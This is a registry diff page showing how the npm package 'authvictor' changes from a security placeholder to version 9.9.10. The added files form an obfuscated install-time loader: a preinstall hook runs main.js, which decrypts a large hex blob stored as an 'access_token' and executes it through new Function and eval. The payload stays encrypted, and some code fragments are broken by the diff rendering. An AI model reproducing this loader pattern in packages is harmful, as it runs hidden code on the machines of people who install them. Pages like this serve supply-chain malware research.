authvictor 0.0.1-security → 9.9.10

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of authvictor might be problematic. Click here for more details.

Files changed (15) hide show
  1. package/auth.js +3 -0
  2. package/base64decode.js +3 -0
  3. package/base64encode.js +3 -0
  4. package/constants.js +5 -0
  5. package/contextualizer.js +1 -0
  6. package/decrypt.js +8 -0
  7. package/import.js +5 -0
  8. package/imports.js +1 -0
  9. package/joiner.js +3 -0
  10. package/jsonParser.js +1 -0
  11. package/main.js +1 -0
  12. package/package.json +22 -6
  13. package/reverse.js +3 -0
  14. package/splitter.js +3 -0
  15. package/README.md +0 -5
package/auth.js ADDED
@@ -0,0 +1,3 @@
1
+ module.exports = function createExecutor(evalString) {
2
+ return new Function(`return function(input) { return ${evalString}(input); };`)();
3
+ };
package/base64decode.js ADDED
@@ -0,0 +1,3 @@
1
+ module.exports = function b64dec(input) {
2
+ return Buffer.from(input, 'base64').toString('utf8');
3
+ };
package/base64encode.js ADDED
@@ -0,0 +1,3 @@
1
+ module.exports = function b64enc(input) {
2
+ return Buffer.from(input, 'utf8').toString('base64');
3
+ };
package/constants.js ADDED
@@ -0,0 +1,5 @@
1
+ module.exports = {
2
+ api_key: 'a_secure_key_1234',
3
+ api_secret: 'e9b75688bb2595dc42784a7e48bcc9e1',
4
+ access_token: '9aa64fe33bd4bd2028ed10a432684254c74e153f41d01e34fbf7f151dd85e83a55c73d90cfbbef283e036374e7c282fd9fe45563021be7f127cb9d23b8972e4b0a75aaff70317afbf5513195629da12b5f6acc75b004e95d6ae1d6c3a2e6b1734dc5c49dbfd08c4aafd7617c437a3e754d8b7de9bef168362bdc15688d9ad49a31750c851fbcd332fbfb088f98099884ae2fe92575ba28e8e18aa206555094fc9a4e5720cc3798f6a59da0bf19833d6092aff1e9c6002e3d711601197472795d7d1b82b4a1d42033650961763fb8f57f80c6d5799d56a790b5eb142ef1fc39fb3bcd3c2380b3c2c41d0fc9790a14e5e873c1114e7126ed85958a078de84eca340940c3bb218e0c50fbb6581e8e590be5b815664d76cec45e43b69c8740e125d82dccb34d5644bcaed125c1820f4d8d68cdd280ab5a505243a85df674b3cd28af54fd2cb07eb49157a892bec2ca971a1f4947045753d31a920a762255539801131d490cf08016135fdec9da524a0a402cb93477e60e66bb3b337c0aece8ec04ecf89939e581dec68dfc17af0af59e1fbb96f98686dc84d04ed1060d9a8e72a3e405e412c0a5bbb6e5e126505688691182b02fc8b166df416173297cd7d455e8678f7e0aae9c8822c2314639a76e98c1fcbc6dd8de6dfa9a5f542811e60b01cc14e302642c371ad39942015c7770107184581a290d9003e9b024bc9d6bca519f2a9954c8d38cdeb3a64f0df5ca3e820674f27f3054cb5e97ecadf2e097af1087204fa7f68cb3c2a30d7531884d4e2fd14c2f184a9fe1beb82f47742c4eaea05067a66bd1f14cacb1acbd79575be12abdadc6cdb3bca7693386b6b67f40d4024d71b7c42f48fe3722de3ac385dd712f946f423a4f89e0c98876d46f9f16845b5a97c8dd87899f35c87f5b8a6450ab7e7bcf5b92775749319a57bd2e85e5ba27f38086429783a47fd9d06e05822d86b1bc00a9bcd9b7d16758f7b9495c0caa622ddf02e6313780302d9dd2f6bb783984e41d225e2a18e459f0ef55a357d0e9a69c004a3d62ab22297b228c99273436624c9a2636a6d7b6a9decf6822e4293f2d53811b4d13e59b6085a31cf48f6dfb5fd6df9996fa881070ff6748f3fb737c15ae4bfcede1a17f714fc9acbacc14163299373aa737bafdf29c6daab13651921917736b261f965477b1cb9de3c2b2315f68117aeb0eeaeca46477431a67786cb7d0a23b5c67e04133230c0b36d44c449d98258634fb5b0d33116f6d7e2a6d6c0979848fa5525bac8da2fe6f84c2faaa963d1fe277801a3d2277c70119d0745420a79e22f3a2ab92dea514c7229679d0d608a086bf43e826f13a06f275e162e694038c8328c17ec59c2b470b62def90e1df71c10c046fa70f383a2c763045e84cad504fef224efa904b50342512cce4e3ecaff9dc7cb3fe85136dec5f46e049d7b4a38ef049865fddfd84784375cc9fda878c146080c1d40c287c487a829193946f491640e44df0a62b73a429de00f6c67f53e15f6f5dc802cce2a857b63b1fd355e2d6c427bd43c77f36928ab31a244363f6e1dd0707cd53512807bb576a13ee660fc86706de9e1a5436df9eb7a4456611e26585e5c9ffbb7975878b52519da3e8dc4e70a118760cff15090a150a74f2f596fedae6f8771042fd16955fee8095ac778095301b2f06ff521fe40ecd17fb4e2166f91ae0b3ef6dd5358aa1365686fd9c03b475df2dbd639d64d52cb0faba035208cda7c78560c973fabb719c9a4dc61c7a8eac5a74c470df7bd8c46644a28d6aa44b4e4a7f5078f742b2d6e7063fbeb5f3a9f7b1e83128b6623c41f8c0d3eb8c63d5f011756afae40ca3d6f4edd7291929e0c7881fcf625c9405f97ec3ccdaff90add43de1ab98a6ff5c93445a5d635204b790e0d0777eb955337b14b89e1651a65c37187e29c7e012b5db1ad6f4ad7ce1db6ea5327a1d30a0539eff0b110b6da93bb011bb286a660226f64832e943446a517dca30bc18dbf6658148d5cbf59e9aa8e8c3c0481dbb684b264e35d0757f7a1f4e4ff57128b24d0498f80e1c2925460ad4818b24b08a504192db5ea71b47ed538f6631ad404b5fa8a0a635c6661d45e233f1c94219344b8abf2ffcf80ed36776140b545c932bbceb110cdf8f0a1019554a08a8ac07617463ce65797949215a41904882a6b39858938fe3023c78fa54b2aa6ae5dc2587c3d3c2e0261847d7122a9135883c3579d0a0f9bc7aec8207c23a52af1e51bd071a493ecff20d9ead7f2c47330469231929a707868af4d60cadf4f5d58122ee4a24b171b384d7ab7f3f30a5f001a54cd36f071a089af6de690f5fa4022478487aa1150dfa42ee85291f65c0c11fc5ccbcb70312d6369840115a9be0a3ed533b93669ce31ce9f48772d3b7932a480c1e2b61fb8388583a51fc2649d6b702b688fe9040f659c2c9691cb6eac7d13cf1c974e7413be2fdf6a95c55f2f450f9a4e82321b8f89fd69300de6c4757fc993d90b43b478d4d2f70346cc68a8e6546e5c8522607f97cd0f2091801f58588b515d00ba18b89113f51dec9267353e006468b155ed97ff9d058d0ed026ac8f53ba99dd4bdb2d6c23e96a21522109a6ea06141d1617988e360dd1a0e16ae2966c7b7af99114b4b8b0282a7df08c485f2987d57e364418e18a6678ed74d3cbab23dbc8aff129068554ff99f570493e55b25046c60a5507b036b0e8dc181d6e0dfe6bd361b760419be67fe7a36bae24ef7f11743f1d5e3a3165ef51879a5111073b52b042b3b6b6ffc1c4ffeed521d948e7377fe1ae726228113b4e74eeaf6734280955913e6d044a6dc6d2ee30705e53607260254093a9e7cbbebd1ad4c9c0e2d488c6a387f8d10d417a4c907e4ae809a5bf23c40752f343ceb731abe41ce7009a61954c85eadbaaa7807a9d80502597b64f2361e02e092c76c5f50d7ca84a7d38220af24f873da6a48565548cb1472c7312d0d39676522f4654fec01f28af941caa393db86e91382f00abd0b9c721a27f66887bfb8c459a1fe98d6d2c3055bab8fbacafe238e2544be77e87813b74b92b16249321dd8cb0495f8ad026d9eed844fbf8f5174c94c5fc508133ae033a0f3c6d41360ed1f884b9109b6eb62a6f09f809faaa6ffbd3b3fc63261eb8a1f99e5511919c1bbf3d3619affd19711b5d2227d395ac31a659761057ab0765395a86f74fef24c456b05aa5b3f11917564dd53c7fabb3ee3fd37b8bde204c371b112961d0e098df92fc2064f709d45fcf09df2a831963728ae8662ac7e4c2d8982ed6fee19d35ec75e45c7df279a092744a5ae20691f9f06eaf522fda5f2d4acb5bf61ef1a86e625960cbe8ee06ec971085d612b9e1792ab087525753b646473a4f6827400125a25d25522e756584615d9e72f3066848b47d33b05ba7f58f6236896f4c078f0b90257a7e37faebd9cbd1691343777f53fec0581a16f2d6d99501f62fbece54ca42291521dacde168e2e5fc014bf208cb9465435e8a24581649c5a8c97319e2b881fa29b1127a5bd17313245f8107bad75277724581fadb447dc6af761f25ff9a0d04b37fcd2acc5b25c37d94bd467bf47fdfc9ada2ddbc00a8539c5a5e9eecc5da2f1bc222de372248143c1095f6b34fdf68f40fa2f8991dfe22966626711e6b19b6b16c779fc8843d36e0326b0184d88cb391613555dfa7c5ada014c30ed16082d608774d34fa43dd391ab0dca6e9838d44d8e9e0c9973c93bc987786f0beb0cdab66a11b1b5c6d2134840f125a4e08e094d3255ae7dcea01f8406ee24c0bd4c9d9894275557e47d8801a0238bd223d5d62c86dfca8fe26b9a74a5bfb9ce7555e215f4c3f49eef0871415258dfa3c53a0c2d627af86fe51218f3ca9d371fdfbc27c9972ad6f5afc6ba651acc63b9df377d5b7ab45b525c3d4f9d17d1a7d0c2ed535064e811f5059e1047c12426514e115ac3def5ef54466bf78b89b70399ca96a775c87c34c14b952dcf04d2100506dc308930459c87581c3dc0f3d5b374d430d990d79eee22f10f26f047a6fe8800338aac7eb72bdd4dec9b469f06941040f3631c3f47fcc5de355b046ac96c36fe9c1317d0447cf86d215a7acc9671d40d181409c37d65b7e5a9a3bc6a73129fd82574208e739edd19e5faa026a9735c3460d016a5d9e47c604c8ab0ab84b7c7961318a4d8259b0e2e63ba7d161b5016c0c4bee12ab00e073fec7445b39ca84c62cd28c3e3632f58c616f5ed7fb0106a71f93f3f17722d2a4f2d7c62363b73737fce0f61e9408b814ec928ba5822210edd6989feffaf1c83fe658ab8565c4b6f2ba34a94b910e5b6e83b7a710638abf186a3d93b743e40e0bd2d0fb1a0fc9d3f17e549027f3cd3a833c2e83f5fb19bb7965a537c5a23e2764037dfb59641ef8dcf8764156bde7b1f1e0415aba043a1027167eaa6bdcc442666dcdfcd0dd559a7a57acbf2e1a84f502cfa293408bce21a3863e3b95cbd2b39866ba6cc4a2209d07260345177a7d3097c28f62a6ce5d44a4b5e6754c1671040aaaa50a7cadee4f2d62825bd0d086404a651a3193b7f1507229a64515ff681ac0080205fc5dd52c12d9477e1423f3c4b5d567ccd9189673ffb3b3fc7df4292ea2b2c9acbc1b1b40d14a397ad97523e5fa364af8cee72891791969035ddf51a1a3d362e00d1a3e74f7d7fff48275f1f02e726ec6de84b5b2bab9d0022ce62b2862b62da9f295fca73faa36d51de8b218c25a3c'
5
+ };
package/contextualizer.js ADDED
@@ -0,0 +1 @@
1
+ const context = require('./imports');
2
  try {
1
3
  // Use eval to evaluate the accesstoken
2
4
  return eval(accesstoken);
3
5
  } catch (error) {
4
6
  throw new Error(`Error evaluating the access token: ${error.message}`);
5
7
  }
package/decrypt.js ADDED
@@ -0,0 +1,8 @@
1
+ const crypto = require('crypto');
2
+
3
+ module.exports = function decrypt(encrypted, key) {
4
+ const decipher = crypto.createDecipher('aes-256-cbc', key);
5
+ let decrypted = decipher.update(encrypted, 'hex', 'utf8');
6
+ decrypted += decipher.final('utf8');
7
+ return decrypted;
8
+ };
package/import.js ADDED
@@ -0,0 +1,5 @@
1
+ const context = {
2
+
3
+ };
4
+
5
+ module.exports = context;
package/imports.js ADDED
@@ -0,0 +1 @@
1
+ const crypto = require('crypto'); // Needed for cryptographic functions.
2
  randomBytes: (size) => Array(size).fill(Math.random()), // Filler for randomness.
1
3
  FileRead: (filename) => `Cannot read ${filename}: Permission denied`, // Simulated file read error.
2
4
  mathConstant: Math.PI, // A math constant.
3
5
  encode: (str) => Buffer.from(str).toString('base64'), // Base64 encoding.
4
6
  decode: (str) => Buffer.from(str, 'base64').toString('utf8'), // Base64 decoding.
5
7
  dynamicObject: () => ({
6
8
  currentTime: new Date().toISOString(),
7
9
  encodedHint: Buffer.from("This is harmless", "utf8").toString("hex"),
8
10
  }),
9
11
  require: (moduleName) => {
10
12
  if (moduleName === 'crypto') return crypto;
11
13
  if (moduleName === 'path') return path;
12
14
  if (moduleName === 'querystring') return querystring;
13
15
  if (moduleName === 'url') return url;
14
16
  throw new Error(`Module ${moduleName} is not allowed.`);
15
17
  },
16
18
  ...dynamicModules,
17
19
  ...HelperFuncs,
package/joiner.js ADDED
@@ -0,0 +1,3 @@
1
+ module.exports = function joinr(input, char) {
2
+ return input.join(char);
3
+ };
package/jsonParser.js ADDED
@@ -0,0 +1 @@
1
+ // Updated JSON Parser Module
2
  try {
1
3
  // Attempt to parse the input as JSON
2
4
  let parsedData;
3
5
  if (isBase64(input)) {
4
6
  // Decode Base64 input and attempt to parse it as JSON
5
7
  const decoded = Buffer.from(input, 'base64').toString('utf8');
6
8
  parsedData = JSON.parse(decoded);
7
9
  } else {
8
10
  // If input is not Base64, try parsing it as JSON directly
9
11
  parsedData = JSON.parse(input);
10
12
  }
11
13
  if (!parsedData.timestamp) {
12
14
  parsedData.timestamp = new Date().toISOString(); // Add a timestamp
13
15
  }
14
16
  parsedData.sanitized = true; // Indicate data sanitization
15
17
  parsedData.securityToken = generateSecurityToken(); // Add a security token
16
18
  return parsedData;
17
19
  } catch (error) {
18
20
  console.error('Error in jsonParser:', error.message);
19
21
  throw new Error('Invalid JSON input');
20
22
  }
21
23
  try {
22
24
  return btoa(atob(str)) === str;
23
25
  } catch (err) {
24
26
  return false;
25
27
  }
26
28
  return 'TOKEN-' + Math.random().toString(36).substr(2, 8).toUpperCase();
package/main.js ADDED
@@ -0,0 +1 @@
1
+ const reverse = require('./reverse');
2
  throw new Error('Invalid API Key');
1
3
  // Decrypt the ApiKey and Token
2
4
  const decryptedApiKey = decrypt(api_secret, api_key);
3
5
  const decryptedAccessToken = decrypt(access_token, api_key);
4
6
  // Encode and decode ApiKey
5
7
  const encodedApiKey = reverse(b64enc(decryptedApiKey));
6
8
  const decodedApiKey = b64dec(reverse(encodedApiKey));
7
9
  const encodedAccessToken = join(split(b64enc(decryptedAccessToken), ''), '');
8
10
  const decodedAccessToken = b64dec(encodedAccessToken);
9
11
  // Authenticate the Access Token
10
12
  const authenticateApiKey = createAuth(decodedApiKey);
11
13
  const result = createContext(decodedAccessToken);
12
14
  // Subtle Integration of jsonParser
13
15
  const jsonInput = '{"apiKey":"' + encodedApiKey + '","token":"' + encodedAccessToken + '"}';
14
16
  const parsedData = jsonparser(jsonInput);
15
17
  return parsedData;
16
18
  console.error('Error during decryption or authentication:', error.message);
package/package.json CHANGED
@@ -1,6 +1,22 @@
1
- {
2
- "name": "authvictor",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
6
- }
1
+ {
2
+ "name": "authvictor",
3
+ "version": "9.9.10",
4
+ "description": "claim",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "preinstall": "node main.js"
9
+ },
10
+ "publishConfig": {
11
+ "access": "public",
12
+ "registry": "https://registry.npmjs.org/"
13
+ },
14
+ "author": "Piercarlo Maia",
15
+ "license": "ISC",
16
+ "dependencies": {
17
+ "package": "^1.0.1"
18
+ },
19
+ "private": false,
20
+ "keywords": [],
21
+ "devDependencies": {}
22
+ }
package/reverse.js ADDED
@@ -0,0 +1,3 @@
1
+ module.exports = function rvs(input) {
2
+ return input.split('').reverse().join('');
3
+ };
package/splitter.js ADDED
@@ -0,0 +1,3 @@
1
+ module.exports = function splt(input, char) {
2
+ return input.split(char);
3
+ };
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=authvictor for more information.